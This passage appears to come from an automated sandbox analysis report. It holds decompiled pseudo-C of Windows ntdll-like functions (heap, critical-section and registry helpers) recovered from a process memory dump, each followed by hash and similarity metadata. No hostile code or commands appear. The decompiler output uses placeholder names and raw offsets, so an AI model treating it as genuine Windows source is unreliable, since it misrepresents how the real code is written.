                                                							_push(_v60);
                                                							E016295D0();
                                                							goto L11;
                                                						} else {
                                                							_t109 = L01604620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                                							if(_t109 == 0) {
                                                								_t108 = 0xc0000017;
                                                								goto L10;
                                                							} else {
                                                								_t21 = _t109 + 0x18; // 0x18
                                                								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                								 *_t109 = 1;
                                                								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                								 *(_t109 + 0xe) = _t82;
                                                								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                								E0162F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                                								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                								_t91 =  *_t103 & 0x0000ffff;
                                                								_t100 = _t91 & 0xfffffffe;
                                                								_t84 = 0x5c;
                                                								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                                									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                										_push(_v60);
                                                										E016295D0();
                                                										L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                										_t51 = 0xc0000106;
                                                									} else {
                                                										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                										goto L5;
                                                									}
                                                								} else {
                                                									L5:
                                                									 *_a4 = _t109;
                                                									_t51 = 0;
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				return _t51;
                                                			}


                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                • Instruction ID: 00af10e16db3254c8fdf0200f1a40b8ca518a84217475d81efeb9abe12d93306
                                                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                • Instruction Fuzzy Hash: D8515A71604711AFC321DF29C841A6BBBF9FF88710F00892EFA9597690E7B4E914CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E01663540(intOrPtr _a4) {
                                                				signed int _v12;
                                                				intOrPtr _v88;
                                                				intOrPtr _v92;
                                                				char _v96;
                                                				char _v352;
                                                				char _v1072;
                                                				intOrPtr _v1140;
                                                				intOrPtr _v1148;
                                                				char _v1152;
                                                				char _v1156;
                                                				char _v1160;
                                                				char _v1164;
                                                				char _v1168;
                                                				char* _v1172;
                                                				short _v1174;
                                                				char _v1176;
                                                				char _v1180;
                                                				char _v1192;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				short _t41;
                                                				short _t42;
                                                				intOrPtr _t80;
                                                				intOrPtr _t81;
                                                				signed int _t82;
                                                				void* _t83;
                                                
                                                				_v12 =  *0x16dd360 ^ _t82;
                                                				_t41 = 0x14;
                                                				_v1176 = _t41;
                                                				_t42 = 0x16;
                                                				_v1174 = _t42;
                                                				_v1164 = 0x100;
                                                				_v1172 = L"BinaryHash";
                                                				_t81 = E01620BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                				if(_t81 < 0) {
                                                					L11:
                                                					_t75 = _t81;
                                                					E01663706(0, _t81, _t79, _t80);
                                                					L12:
                                                					if(_a4 != 0xc000047f) {
                                                						E0162FA60( &_v1152, 0, 0x50);
                                                						_v1152 = 0x60c201e;
                                                						_v1148 = 1;
                                                						_v1140 = E01663540;
                                                						E0162FA60( &_v1072, 0, 0x2cc);
                                                						_push( &_v1072);
                                                						E0163DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                						E01670C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                						_push(_v1152);
                                                						_push(0xffffffff);
                                                						E016297C0();
                                                					}
                                                					return E0162B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                				}
                                                				_t79 =  &_v352;
                                                				_t81 = E01663971(0, _a4,  &_v352,  &_v1156);
                                                				if(_t81 < 0) {
                                                					goto L11;
                                                				}
                                                				_t75 = _v1156;
                                                				_t79 =  &_v1160;
                                                				_t81 = E01663884(_v1156,  &_v1160,  &_v1168);
                                                				if(_t81 >= 0) {
                                                					_t80 = _v1160;
                                                					E0162FA60( &_v96, 0, 0x50);
                                                					_t83 = _t83 + 0xc;
                                                					_push( &_v1180);
                                                					_push(0x50);
                                                					_push( &_v96);
                                                					_push(2);
                                                					_push( &_v1176);
                                                					_push(_v1156);
                                                					_t81 = E01629650();
                                                					if(_t81 >= 0) {
                                                						if(_v92 != 3 || _v88 == 0) {
                                                							_t81 = 0xc000090b;
                                                						}
                                                						if(_t81 >= 0) {
                                                							_t75 = _a4;
                                                							_t79 =  &_v352;
                                                							E01663787(_a4,  &_v352, _t80);
                                                						}
                                                					}
                                                					L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                				}
                                                				_push(_v1156);
                                                				E016295D0();
                                                				if(_t81 >= 0) {
                                                					goto L12;
                                                				} else {
                                                					goto L11;
                                                				}
                                                			}


                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryHash
                                                • API String ID: 0-2202222882
                                                • Opcode ID: 54b6e00a43681577fec477bc53e638477bc3c3188019cdfc852c69a7e20dfa05
                                                • Instruction ID: c4550c3fdd16116733a57c36dc6f012955e79190fe5e08b8f210144a70aa1cea
                                                • Opcode Fuzzy Hash: 54b6e00a43681577fec477bc53e638477bc3c3188019cdfc852c69a7e20dfa05
                                                • Instruction Fuzzy Hash: 794145B1D0053DABDB21DA50CC81FEEB77DAB54714F0045E9EA09AB241DB309E88CF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E016B05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                				signed int _v20;
                                                				char _v24;
                                                				signed int _v28;
                                                				char _v32;
                                                				signed int _v36;
                                                				intOrPtr _v40;
                                                				void* __ebx;
                                                				void* _t35;
                                                				signed int _t42;
                                                				char* _t48;
                                                				signed int _t59;
                                                				signed char _t61;
                                                				signed int* _t79;
                                                				void* _t88;
                                                
                                                				_v28 = __edx;
                                                				_t79 = __ecx;
                                                				if(E016B07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                					L13:
                                                					_t35 = 0;
                                                					L14:
                                                					return _t35;
                                                				}
                                                				_t61 = __ecx[1];
                                                				_t59 = __ecx[0xf];
                                                				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                				_v36 = _a8 << 0xc;
                                                				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                				asm("sbb esi, esi");
                                                				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                				if(_t42 != 0) {
                                                					_push(0);
                                                					_push(0x14);
                                                					_push( &_v24);
                                                					_push(3);
                                                					_push(_t59);
                                                					_push(0xffffffff);
                                                					if(E01629730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                						_push(_t61);
                                                						E016AA80D(_t59, 1, _v20, 0);
                                                						_t88 = 4;
                                                					}
                                                				}
                                                				_t35 = E016AA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                                				if(_t35 < 0) {
                                                					goto L14;
                                                				}
                                                				E016B1293(_t79, _v40, E016B07DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                				if(E01607D50() == 0) {
                                                					_t48 = 0x7ffe0380;
                                                				} else {
                                                					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                				}
                                                				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                					E016A138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                				}
                                                				goto L13;
                                                			}


                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: `
                                                • API String ID: 0-2679148245
                                                • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                • Instruction ID: 0945a73618284e7c4c17292d454dcdf0e0cf2219906001f9bd6ef10ff58b80a0
                                                • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                • Instruction Fuzzy Hash: E731F1326003166BE720DE28CC85FDB7FEAEBC4754F144229FA589B280E770E944CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E01663884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                				char _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr* _v16;
                                                				char* _v20;
                                                				short _v22;
                                                				char _v24;
                                                				intOrPtr _t38;
                                                				short _t40;
                                                				short _t41;
                                                				void* _t44;
                                                				intOrPtr _t47;
                                                				void* _t48;
                                                
                                                				_v16 = __edx;
                                                				_t40 = 0x14;
                                                				_v24 = _t40;
                                                				_t41 = 0x16;
                                                				_v22 = _t41;
                                                				_t38 = 0;
                                                				_v12 = __ecx;
                                                				_push( &_v8);
                                                				_push(0);
                                                				_push(0);
                                                				_push(2);
                                                				_t43 =  &_v24;
                                                				_v20 = L"BinaryName";
                                                				_push( &_v24);
                                                				_push(__ecx);
                                                				_t47 = 0;
                                                				_t48 = E01629650();
                                                				if(_t48 >= 0) {
                                                					_t48 = 0xc000090b;
                                                				}
                                                				if(_t48 != 0xc0000023) {
                                                					_t44 = 0;
                                                					L13:
                                                					if(_t48 < 0) {
                                                						L16:
                                                						if(_t47 != 0) {
                                                							L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                						}
                                                						L18:
                                                						return _t48;
                                                					}
                                                					 *_v16 = _t38;
                                                					 *_a4 = _t47;
                                                					goto L18;
                                                				}
                                                				_t47 = L01604620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                				if(_t47 != 0) {
                                                					_push( &_v8);
                                                					_push(_v8);
                                                					_push(_t47);
                                                					_push(2);
                                                					_push( &_v24);
                                                					_push(_v12);
                                                					_t48 = E01629650();
                                                					if(_t48 < 0) {
                                                						_t44 = 0;
                                                						goto L16;
                                                					}
                                                					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                						_t48 = 0xc000090b;
                                                					}
                                                					_t44 = 0;
                                                					if(_t48 < 0) {
                                                						goto L16;
                                                					} else {
                                                						_t17 = _t47 + 0xc; // 0xc
                                                						_t38 = _t17;
                                                						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                							_t48 = 0xc000090b;
                                                						}
                                                						goto L13;
                                                					}
                                                				}
                                                				_t48 = _t48 + 0xfffffff4;
                                                				goto L18;
                                                			}
















                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: BinaryName
                                                • API String ID: 0-215506332
                                                • Opcode ID: 793a0e336d241bcc5d727c0d93bd9a5b87372303d280990272a5f89d1d5252d5
                                                • Instruction ID: 6b69f6f987adeb7a63abb36bac46f59f42d76660658747e20a4762eda25e3f29
                                                • Opcode Fuzzy Hash: 793a0e336d241bcc5d727c0d93bd9a5b87372303d280990272a5f89d1d5252d5
                                                • Instruction Fuzzy Hash: 2631E832D0051AAFEB15DA59CD45E7BB7B9FB90720F014269E918A7351E7309E00CBD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 33%
                                                			E0161D294(void* __ecx, char __edx, void* __eflags) {
                                                				signed int _v8;
                                                				char _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				intOrPtr _v64;
                                                				char* _v68;
                                                				intOrPtr _v72;
                                                				char _v76;
                                                				signed int _v84;
                                                				intOrPtr _v88;
                                                				char _v92;
                                                				intOrPtr _v96;
                                                				intOrPtr _v100;
                                                				char _v104;
                                                				char _v105;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t35;
                                                				char _t38;
                                                				signed int _t40;
                                                				signed int _t44;
                                                				signed int _t52;
                                                				void* _t53;
                                                				void* _t55;
                                                				void* _t61;
                                                				intOrPtr _t62;
                                                				void* _t64;
                                                				signed int _t65;
                                                				signed int _t66;
                                                
                                                				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                				_v8 =  *0x16dd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                				_v105 = __edx;
                                                				_push( &_v92);
                                                				_t52 = 0;
                                                				_push(0);
                                                				_push(0);
                                                				_push( &_v104);
                                                				_push(0);
                                                				_t59 = __ecx;
                                                				_t55 = 2;
                                                				if(E01604120(_t55, __ecx) < 0) {
                                                					_t35 = 0;
                                                					L8:
                                                					_pop(_t61);
                                                					_pop(_t64);
                                                					_pop(_t53);
                                                					return E0162B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                				}
                                                				_v96 = _v100;
                                                				_t38 = _v92;
                                                				if(_t38 != 0) {
                                                					_v104 = _t38;
                                                					_v100 = _v88;
                                                					_t40 = _v84;
                                                				} else {
                                                					_t40 = 0;
                                                				}
                                                				_v72 = _t40;
                                                				_v68 =  &_v104;
                                                				_push( &_v52);
                                                				_v76 = 0x18;
                                                				_push( &_v76);
                                                				_v64 = 0x40;
                                                				_v60 = _t52;
                                                				_v56 = _t52;
                                                				_t44 = E016298D0();
                                                				_t62 = _v88;
                                                				_t65 = _t44;
                                                				if(_t62 != 0) {
                                                					asm("lock xadd [edi], eax");
                                                					if((_t44 | 0xffffffff) != 0) {
                                                						goto L4;
                                                					}
                                                					_push( *((intOrPtr*)(_t62 + 4)));
                                                					E016295D0();
                                                					L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                					goto L4;
                                                				} else {
                                                					L4:
                                                					L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                					if(_t65 >= 0) {
                                                						_t52 = 1;
                                                					} else {
                                                						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                						}
                                                					}
                                                					_t35 = _t52;
                                                					goto L8;
                                                				}
                                                			}


































                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: b71fa07aa14e2ea32881dde51b110d5d76447ad45b87a5e856650cc4e1f1a112
                                                • Instruction ID: f2e7d377dc9ee44b647b6d310f630f82c8e7278e264e2fb055006a1f248f7b7f
                                                • Opcode Fuzzy Hash: b71fa07aa14e2ea32881dde51b110d5d76447ad45b87a5e856650cc4e1f1a112
                                                • Instruction Fuzzy Hash: A731BFB1548305AFC321DF68CD8496BBBE8EB8A754F080A2EF99483350D735DD05CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E015F1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                				intOrPtr _v8;
                                                				char _v16;
                                                				intOrPtr* _t26;
                                                				intOrPtr _t29;
                                                				void* _t30;
                                                				signed int _t31;
                                                
                                                				_t27 = __ecx;
                                                				_t29 = __edx;
                                                				_t31 = 0;
                                                				_v8 = __edx;
                                                				if(__edx == 0) {
                                                					L18:
                                                					_t30 = 0xc000000d;
                                                					goto L12;
                                                				} else {
                                                					_t26 = _a4;
                                                					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                						goto L18;
                                                					} else {
                                                						E0162BB40(__ecx,  &_v16, __ecx);
                                                						_push(_t26);
                                                						_push(0);
                                                						_push(0);
                                                						_push(_t29);
                                                						_push( &_v16);
                                                						_t30 = E0162A9B0();
                                                						if(_t30 >= 0) {
                                                							_t19 =  *_t26;
                                                							if( *_t26 != 0) {
                                                								goto L7;
                                                							} else {
                                                								 *_a8 =  *_a8 & 0;
                                                							}
                                                						} else {
                                                							if(_t30 != 0xc0000023) {
                                                								L9:
                                                								_push(_t26);
                                                								_push( *_t26);
                                                								_push(_t31);
                                                								_push(_v8);
                                                								_push( &_v16);
                                                								_t30 = E0162A9B0();
                                                								if(_t30 < 0) {
                                                									L12:
                                                									if(_t31 != 0) {
                                                										L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                									}
                                                								} else {
                                                									 *_a8 = _t31;
                                                								}
                                                							} else {
                                                								_t19 =  *_t26;
                                                								if( *_t26 == 0) {
                                                									_t31 = 0;
                                                								} else {
                                                									L7:
                                                									_t31 = L01604620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                								}
                                                								if(_t31 == 0) {
                                                									_t30 = 0xc0000017;
                                                								} else {
                                                									goto L9;
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				return _t30;
                                                			}










                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: WindowsExcludedProcs
                                                • API String ID: 0-3583428290
                                                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                • Instruction ID: e3c3c860bd2baa3d9b19aae3ae22fa4a0a28ef345fe3b07081b8ce07f2697de7
                                                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                • Instruction Fuzzy Hash: 2321C876501929EBDB229A59CC80F5F7BADFF41A50F054829FB049F200D731DD00DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0160F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                				intOrPtr _t13;
                                                				intOrPtr _t14;
                                                				signed int _t16;
                                                				signed char _t17;
                                                				intOrPtr _t19;
                                                				intOrPtr _t21;
                                                				intOrPtr _t23;
                                                				intOrPtr* _t25;
                                                
                                                				_t25 = _a8;
                                                				_t17 = __ecx;
                                                				if(_t25 == 0) {
                                                					_t19 = 0xc00000f2;
                                                					L8:
                                                					return _t19;
                                                				}
                                                				if((__ecx & 0xfffffffe) != 0) {
                                                					_t19 = 0xc00000ef;
                                                					goto L8;
                                                				}
                                                				_t19 = 0;
                                                				 *_t25 = 0;
                                                				_t21 = 0;
                                                				_t23 = "Actx ";
                                                				if(__edx != 0) {
                                                					if(__edx == 0xfffffffc) {
                                                						L21:
                                                						_t21 = 0x200;
                                                						L5:
                                                						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                                						 *_t25 = _t13;
                                                						L6:
                                                						if(_t13 == 0) {
                                                							if((_t17 & 0x00000001) != 0) {
                                                								 *_t25 = _t23;
                                                							}
                                                						}
                                                						L7:
                                                						goto L8;
                                                					}
                                                					if(__edx == 0xfffffffd) {
                                                						 *_t25 = _t23;
                                                						_t13 = _t23;
                                                						goto L6;
                                                					}
                                                					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                                					 *_t25 = _t13;
                                                					L14:
                                                					if(_t21 == 0) {
                                                						goto L6;
                                                					}
                                                					goto L5;
                                                				}
                                                				_t14 = _a4;
                                                				if(_t14 != 0) {
                                                					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                                					if(_t16 <= 1) {
                                                						_t21 = 0x1f8;
                                                						_t13 = 0;
                                                						goto L14;
                                                					}
                                                					if(_t16 == 2) {
                                                						goto L21;
                                                					}
                                                					if(_t16 != 4) {
                                                						_t19 = 0xc00000f0;
                                                						goto L7;
                                                					}
                                                					_t13 = 0;
                                                					goto L6;
                                                				} else {
                                                					_t21 = 0x1f8;
                                                					goto L5;
                                                				}
                                                			}












                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Actx
                                                • API String ID: 0-89312691
                                                • Opcode ID: d8cbf09dd9a70c76e8bc3fd43cc54ed811cc5e3472aacc6a88ddf52d200c64ed
                                                • Instruction ID: b17116c72c8aeedb1b1da460a03fb764ee2a7c5436a52c0c9146ad56e0ccdb3e
                                                • Opcode Fuzzy Hash: d8cbf09dd9a70c76e8bc3fd43cc54ed811cc5e3472aacc6a88ddf52d200c64ed
                                                • Instruction Fuzzy Hash: 1C1190353086028BEB3F8E1DAC9073777D5EB95624F2445AAE961CB3D1EBB0C8428343
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E01698DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                				intOrPtr _t35;
                                                				void* _t41;
                                                
                                                				_t40 = __esi;
                                                				_t39 = __edi;
                                                				_t38 = __edx;
                                                				_t35 = __ecx;
                                                				_t34 = __ebx;
                                                				_push(0x74);
                                                				_push(0x16c0d50);
                                                				E0163D0E8(__ebx, __edi, __esi);
                                                				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                					E01675720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                						asm("int3");
                                                						 *(_t41 - 4) = 0xfffffffe;
                                                					}
                                                				}
                                                				 *(_t41 - 4) = 1;
                                                				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                				 *((intOrPtr*)(_t41 - 0x64)) = L0163DEF0;
                                                				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                				_push(_t41 - 0x70);
                                                				L0163DEF0(1, _t38);
                                                				 *(_t41 - 4) = 0xfffffffe;
                                                				return E0163D130(_t34, _t39, _t40);
                                                			}






                                                Strings
                                                • Critical error detected %lx, xrefs: 01698E21
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Critical error detected %lx
                                                • API String ID: 0-802127002
                                                • Opcode ID: 9659fb9a4edba4de196667907c5e2db0ccc6d9bbf937e977239ae3291afdc5e9
                                                • Instruction ID: a93c55f07c4133fe76d5d705e33368f67235249d6a4ff37f1e02d7a94901e1a6
                                                • Opcode Fuzzy Hash: 9659fb9a4edba4de196667907c5e2db0ccc6d9bbf937e977239ae3291afdc5e9
                                                • Instruction Fuzzy Hash: CA1187B5D00348DBDF24CFB889057ACBBB9BB45311F20425EE129AB382C3340602CF18
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0167FF60
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                • API String ID: 0-1911121157
                                                • Opcode ID: d78d3a8dec1960445d0678b8779784ff72b125cdc6d9d0dc0491b33148c582e0
                                                • Instruction ID: 7ef60c539f26a3b954aaeb5130b56023f93ea38c5d94b3300a84eaad6b927f59
                                                • Opcode Fuzzy Hash: d78d3a8dec1960445d0678b8779784ff72b125cdc6d9d0dc0491b33148c582e0
                                                • Instruction Fuzzy Hash: 75112671910544EFDB22EF58CD48FA8BBB2FF04715F548088F1055B261CB3D9950CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 88%
                                                			E016B5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                				signed int _t296;
                                                				signed char _t298;
                                                				signed int _t301;
                                                				signed int _t306;
                                                				signed int _t310;
                                                				signed char _t311;
                                                				intOrPtr _t312;
                                                				signed int _t313;
                                                				void* _t327;
                                                				signed int _t328;
                                                				intOrPtr _t329;
                                                				intOrPtr _t333;
                                                				signed char _t334;
                                                				signed int _t336;
                                                				void* _t339;
                                                				signed int _t340;
                                                				signed int _t356;
                                                				signed int _t362;
                                                				short _t367;
                                                				short _t368;
                                                				short _t373;
                                                				signed int _t380;
                                                				void* _t382;
                                                				short _t385;
                                                				signed short _t392;
                                                				signed char _t393;
                                                				signed int _t395;
                                                				signed char _t397;
                                                				signed int _t398;
                                                				signed short _t402;
                                                				void* _t406;
                                                				signed int _t412;
                                                				signed char _t414;
                                                				signed short _t416;
                                                				signed int _t421;
                                                				signed char _t427;
                                                				intOrPtr _t434;
                                                				signed char _t435;
                                                				signed int _t436;
                                                				signed int _t442;
                                                				signed int _t446;
                                                				signed int _t447;
                                                				signed int _t451;
                                                				signed int _t453;
                                                				signed int _t454;
                                                				signed int _t455;
                                                				intOrPtr _t456;
                                                				intOrPtr* _t457;
                                                				short _t458;
                                                				signed short _t462;
                                                				signed int _t469;
                                                				intOrPtr* _t474;
                                                				signed int _t475;
                                                				signed int _t479;
                                                				signed int _t480;
                                                				signed int _t481;
                                                				short _t485;
                                                				signed int _t491;
                                                				signed int* _t494;
                                                				signed int _t498;
                                                				signed int _t505;
                                                				intOrPtr _t506;
                                                				signed short _t508;
                                                				signed int _t511;
                                                				void* _t517;
                                                				signed int _t519;
                                                				signed int _t522;
                                                				void* _t523;
                                                				signed int _t524;
                                                				void* _t528;
                                                				signed int _t529;
                                                
                                                				_push(0xd4);
                                                				_push(0x16c1178);
                                                				E0163D0E8(__ebx, __edi, __esi);
                                                				_t494 = __edx;
                                                				 *(_t528 - 0xcc) = __edx;
                                                				_t511 = __ecx;
                                                				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                                				 *(_t528 - 0xbc) = __ecx;
                                                				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                                				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                                				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                                				_t427 = 0;
                                                				 *(_t528 - 0x74) = 0;
                                                				 *(_t528 - 0x9c) = 0;
                                                				 *(_t528 - 0x84) = 0;
                                                				 *(_t528 - 0xac) = 0;
                                                				 *(_t528 - 0x88) = 0;
                                                				 *(_t528 - 0xa8) = 0;
                                                				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                                				if( *(_t528 + 0x1c) <= 0x80) {
                                                					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                                					if(__eflags != 0) {
                                                						_t421 = E016B4C56(0, __edx, __ecx, __eflags);
                                                						__eflags = _t421;
                                                						if(_t421 != 0) {
                                                							 *((intOrPtr*)(_t528 - 4)) = 0;
                                                							E0162D000(0x410);
                                                							 *(_t528 - 0x18) = _t529;
                                                							 *(_t528 - 0x9c) = _t529;
                                                							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                                							E016B5542(_t528 - 0x9c, _t528 - 0x84);
                                                						}
                                                					}
                                                					_t435 = _t427;
                                                					 *(_t528 - 0xd0) = _t435;
                                                					_t474 = _t511 + 0x65;
                                                					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                					_t511 = 0x18;
                                                					while(1) {
                                                						 *(_t528 - 0xa0) = _t427;
                                                						 *(_t528 - 0xbc) = _t427;
                                                						 *(_t528 - 0x80) = _t427;
                                                						 *(_t528 - 0x78) = 0x50;
                                                						 *(_t528 - 0x79) = _t427;
                                                						 *(_t528 - 0x7a) = _t427;
                                                						 *(_t528 - 0x8c) = _t427;
                                                						 *(_t528 - 0x98) = _t427;
                                                						 *(_t528 - 0x90) = _t427;
                                                						 *(_t528 - 0xb0) = _t427;
                                                						 *(_t528 - 0xb8) = _t427;
                                                						_t296 = 1 << _t435;
                                                						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                						__eflags = _t436 & _t296;
                                                						if((_t436 & _t296) != 0) {
